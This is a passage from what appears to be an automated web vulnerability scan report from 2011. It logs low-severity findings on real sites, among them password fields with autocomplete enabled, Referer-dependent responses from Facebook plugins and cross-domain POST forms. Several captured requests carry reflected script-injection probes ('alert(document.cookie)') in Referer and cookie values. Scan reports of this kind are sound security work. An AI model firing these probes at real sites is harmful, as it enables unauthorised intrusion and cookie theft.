Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.126. http://www.travelingcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.travelingcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.travelingcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.travelingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.127. http://www.truckingcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.truckingcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.truckingcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.truckingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.128. http://www.tvcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.tvcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.tvcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.tvcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.129. http://www.underwritingcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.underwritingcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.underwritingcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.underwritingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.130. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.vault.com
Path:	/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP

Issue detail

The page contains a form with the following action URL:

http://www.vault.com/wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L3dDb1ZJQSEhL3dPb0JKTnNBLzREMGo5ZWtBU0VFIS86allRRDY4NzIwMDEyLzIyMjIxL2xp/

The form contains the following password fields with autocomplete enabled:

password
UserConfirm

Request

GET /wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP?companyId=421 HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.131. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.vault.com
Path:	/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP

Issue detail

The page contains a form with the following action URL:

http://www.vault.com/wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L3dDb1ZJQSEhL3dPb0JKTnNBLzREMGo5ZWtBU0VFIS9xallRRDY4NzIwMDExLzIyMjIwL2xp/

The form contains the following password field with autocomplete enabled:

password

Request

Response

11.132. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.vault.com
Path:	/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP

Issue detail

The page contains a form with the following action URL:

http://www.vault.com/wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L3dDb1ZJQSEhL3dPb0JKTnNBLzREMGo5ZWtBU0VFIS9JNGhyUDM0MzgwMDA4LzIyMjA4L2xp/

The form contains the following password field with autocomplete enabled:

password

Request

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:46:04 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Content-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000rcR5rVICpK5SDIbUDVt8YPK:14a07ck6b; Path=/
Keep-Alive: timeout=10, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a9145525d5f4f58455e445a4a423660;expires=Fri, 21-Jan-2011 19:13:07 GMT;path=/
Content-Length: 67073

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
</div>

<form id="mainLoginForm" name="mainLoginForm" action="/wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L3dDb1ZJQSEhL3dPb0JKTnNBLzREMGo5ZWtBU0VFIS9JNGhyUDM0MzgwMDA4LzIyMjA4L2xp/" method="POST">
<div class="lightbox_text2">
...[SNIP]...
</label>
<input type="password" name="password" id="password" value="" />
<br />
...[SNIP]...

11.133. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.vault.com
Path:	/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP

Issue detail

The page contains a form with the following action URL:

http://www.vault.com/wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L3dDb1ZJQSEhL3dPb0JKTnNBLzREMGo5ZWtBU0VFIS9NNGhyUDM0MzgwMDA5LzIyMjA5L2xp/

The form contains the following password fields with autocomplete enabled:

password
UserConfirm

Request

Response

11.134. http://www.veterinarycrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.veterinarycrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.veterinarycrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.veterinarycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.135. http://www.volunteercrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.volunteercrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.volunteercrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.volunteercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.136. http://www.woothemes.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.woothemes.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.woothemes.com/wp-login.php

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.woothemes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.137. http://www.workathomecrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.workathomecrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.workathomecrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.workathomecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.138. http://www.writingcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.writingcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.writingcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.writingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12. Referer-dependent response previous next
There are 2 instances of this issue:

/plugins/like.php
/plugins/likebox.php

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defenses are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defenses against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defenses against malicious input should be employed here as for any other kinds of user-supplied data.

12.1. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/plugins/like.php

Request 1

GET /plugins/like.php?href=http%3A%2F%2Fweekendedition.news.yahoo.com&layout=button_count&show_faces=false&width=85&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://news.yahoo.com/s/nm/us_bankofamerica;_ylt=AlohsBp579RpJ1eBqn0kxP.s0NUE;_ylu=X3oDMTNobm1hMzM5BGFzc2V0A25tLzIwMTEwMTIxL3VzX2JhbmtvZmFtZXJpY2EEY2NvZGUDbW9zdHBvcHVsYXIEY3BvcwMzBHBvcwMxMQRwdANob21lX2Nva2UEc2VjA3luX3RvcF9zdG9yeQRzbGsDYmFua29mYW1lcmlj
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dtheclicker.todayshow.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Ftheclicker.todayshow.com%252F%253F28d8a%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E1b20a3de4c0%253D1%26extra_2%3DUS

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Fri, 21 Jan 2011 18:22:05 GMT
Content-Length: 8036

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4d39cecde04f99075564628" class="connect_widget button_count" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid connect_widget_button_count_summary" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up"></div></td><td><div class="undo hidden_elem"><label class="undo_button uiCloseButton uiCloseButtonSmall uiCloseButtonSmall"><input title="Remove" type="button" /></label></div></td><td><div class="summary_text">10K people</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"></div></td><td><div class="connect_widget_button_count_count">10K</div></td></tr></tbody></table></td></tr></table></div><script type="text/javascript">
Env={module:"like_widget",impid:"7546b011",user:0,locale:"en_US",method:"GET",dev:0,start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:334488,vip:"66.220.146.32",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",tlds:["com"],rep_lag:20,pc:{"m":"1.0.4","l":"1.0.4","axi":true,"j":true,"bsz":16},fb_dtsg:"N9lIZ",lhsh:"28366",tracking_domain:"http:\/\/pixel.facebook.com",silent_oops_errors:"1",ajax_threshold:"1",use_css_import_in_ie:"1",ajaxpipe_enabled:"1",chat_fe_rewrite:"1"};
</script>
<script type="text/javascript">Bootloader.setResourceMap({"JOgNK":{"type":"css","permanent":1,"src":"http:\/\/b.static.ak.fbcdn.net\/rsrc.php\/yU\/r\/jKqmG9e3p5H.css"},"s8NLO":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/yL\/r\/0iTqcR_XEYF.css"},"wDcHm":{"type":"css","permanent":1,"src":"http
...[SNIP]...

Request 2

GET /plugins/like.php?href=http%3A%2F%2Fweekendedition.news.yahoo.com&layout=button_count&show_faces=false&width=85&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dtheclicker.todayshow.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Ftheclicker.todayshow.com%252F%253F28d8a%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E1b20a3de4c0%253D1%26extra_2%3DUS

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Fri, 21 Jan 2011 18:23:17 GMT
Content-Length: 7782

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4d39cf156e5e62853096200" class="connect_widget button_count" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid connect_widget_button_count_summary" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up"></div></td><td><div class="undo hidden_elem"><label class="undo_button uiCloseButton uiCloseButtonSmall uiCloseButtonSmall"><input title="Remove" type="button" /></label></div></td><td><div class="summary_text">10K people</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"></div></td><td><div class="connect_widget_button_count_count">10K</div></td></tr></tbody></table></td></tr></table></div><script type="text/javascript">
Env={module:"like_widget",impid:"1ed77037",user:0,locale:"en_US",method:"GET",dev:0,start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:334488,vip:"66.220.146.32",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",tlds:["com"],rep_lag:20,pc:{"m":"1.0.4","l":"1.0.4","axi":true,"j":true,"bsz":16},fb_dtsg:"N9lIZ",lhsh:"28366",tracking_domain:"http:\/\/pixel.facebook.com",silent_oops_errors:"1",ajax_threshold:"1",use_css_import_in_ie:"1",ajaxpipe_enabled:"1",chat_fe_rewrite:"1"};
</script>
<script type="text/javascript">Bootloader.setResourceMap({"JOgNK":{"type":"css","permanent":1,"src":"http:\/\/b.static.ak.fbcdn.net\/rsrc.php\/yU\/r\/jKqmG9e3p5H.css"},"s8NLO":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/yL\/r\/0iTqcR_XEYF.css"},"wDcHm":{"type":"css","permanent":1,"src":"http
...[SNIP]...

12.2. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Request 1

GET /plugins/likebox.php?href=http://www.facebook.com/pages/JD2B/298408284363&width=557&colorscheme=light&connections=100&stream=true&header=true&height=557 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.jd2b.com/?f05bd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf651820abc=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Djdjournal.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.jdjournal.com%252F2011%252F01%252F19%252Ffour-partners-from-vinson-elkins-join-gibson-dunn%252F%253F750aa%2527%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E9dfc99fca36%253D1%26extra_2%3DUS; wd=308x80

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Fri, 21 Jan 2011 22:19:18 GMT
Content-Length: 13490

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<input name="partner_id" value="jd2b.com" type="hidden" /><input name="placement" value="like_box" type="hidden" /><input name="extra_1" value="http://www.jd2b.com/?f05bd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf651820abc=1" type="hidden" /><input name="extra_2" value="US" type="hidden" /><label class="mrm fbLoginButton uiButton uiButtonSpecial uiButtonLarge"><input value="Sign Up" type="submit" /></label></form><div class="ConnectActivityLoginMessage">Create an account or <a onclick="ConnectSocialWidget.getInstance("u835849_1").login();"><b>log in</b></a> to see what your friends like.<img class="fbSocialWidgetTrackingPixel img" src="/campaign/impression.php?campaign_id=137675572948107&partner_id=jd2b.com&placement=like_box&extra_1=http%3A%2F%2Fwww.jd2b.com%2F%3Ff05bd%2522%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253Ecf651820abc%3D1&extra_2=US" /></div></div><div class="connect_widget phs pts"><div class="fan_box"><div class=""><div class="connect_top clearfix"><a href="http://www.facebook.com/pages/JD2B/298408284363" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs464.snc4/50291_298408284363_7854726_q.jpg" alt="JD2B" /></a><div class="connect_action"><div class="name_block"><a href="http://www.facebook.com/pages/JD2B/298408284363" target="_blank"><span class="name">JD2B</span></a></div><div><div id="connect_widget_4d3a0666772b32878833507" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widg
...[SNIP]...

Request 2

GET /plugins/likebox.php?href=http://www.facebook.com/pages/JD2B/298408284363&width=557&colorscheme=light&connections=100&stream=true&header=true&height=557 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Djdjournal.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.jdjournal.com%252F2011%252F01%252F19%252Ffour-partners-from-vinson-elkins-join-gibson-dunn%252F%253F750aa%2527%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E9dfc99fca36%253D1%26extra_2%3DUS; wd=308x80

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Fri, 21 Jan 2011 22:20:19 GMT
Content-Length: 13075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<input name="partner_id" value="" type="hidden" /><input name="placement" value="like_box" type="hidden" /><input name="extra_2" value="US" type="hidden" /><label class="mrm fbLoginButton uiButton uiButtonSpecial uiButtonLarge"><input value="Sign Up" type="submit" /></label></form><div class="ConnectActivityLoginMessage">Create an account or <a onclick="ConnectSocialWidget.getInstance("u841959_1").login();"><b>log in</b></a> to see what your friends like.<img class="fbSocialWidgetTrackingPixel img" src="/campaign/impression.php?campaign_id=137675572948107&partner_id&placement=like_box&extra_2=US" /></div></div><div class="connect_widget phs pts"><div class="fan_box"><div class=""><div class="connect_top clearfix"><a href="http://www.facebook.com/pages/JD2B/298408284363" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs464.snc4/50291_298408284363_7854726_q.jpg" alt="JD2B" /></a><div class="connect_action"><div class="name_block"><a href="http://www.facebook.com/pages/JD2B/298408284363" target="_blank"><span class="name">JD2B</span></a></div><div><div id="connect_widget_4d3a06a390ec06634143078" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>JD2B</b>.<span class="unlike_span hidden_elem"><a class="mls connect_widget_unlike_link">Unlike</a></span><span class="connect_widget_admin_span hidden_elem"> · <a class="connect_widget_admin_option">Admin Page</a>
...[SNIP]...

13. Cross-domain POST previous next
There are 5 instances of this issue:

http://www.csmonitor.com/USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal
http://www.csmonitor.com/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity
http://www.hototc.com/
http://www.hototc.com/
http://www.usatoday.com/money/world/2011-01-20-chinabuilding20_ST_N.htm

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

13.1. http://www.csmonitor.com/USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.csmonitor.com
Path:	/USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal

Issue detail

The page contains a form which POSTs data to the domain links.mkt1259.com. The form contains the following fields:

EMAIL_REQUIRED
EMAIL_DATATYPE
EMAIL
submit

Request

GET /USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.2. http://www.csmonitor.com/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.csmonitor.com
Path:	/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity

Issue detail

The page contains a form which POSTs data to the domain links.mkt1259.com. The form contains the following fields:

EMAIL_REQUIRED
EMAIL_DATATYPE
EMAIL
submit

Request

GET /USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.3. http://www.hototc.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hototc.com
Path:	/

Issue detail

The page contains a form which POSTs data to the domain visitor.constantcontact.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.hototc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:30:08 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
ETag: "45f8-4cca7a20-0"
Last-Modified: Fri, 29 Oct 2010 07:39:12 GMT
Content-Type: text/html
Content-Length: 17912

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div class="SignUpBar">
<form name="ccoptin2" action="http://visitor.constantcontact.com/d.jsp" target="_blank" method="post">
<input type="hidden" name="m" value="1101684818180">
...[SNIP]...

13.4. http://www.hototc.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
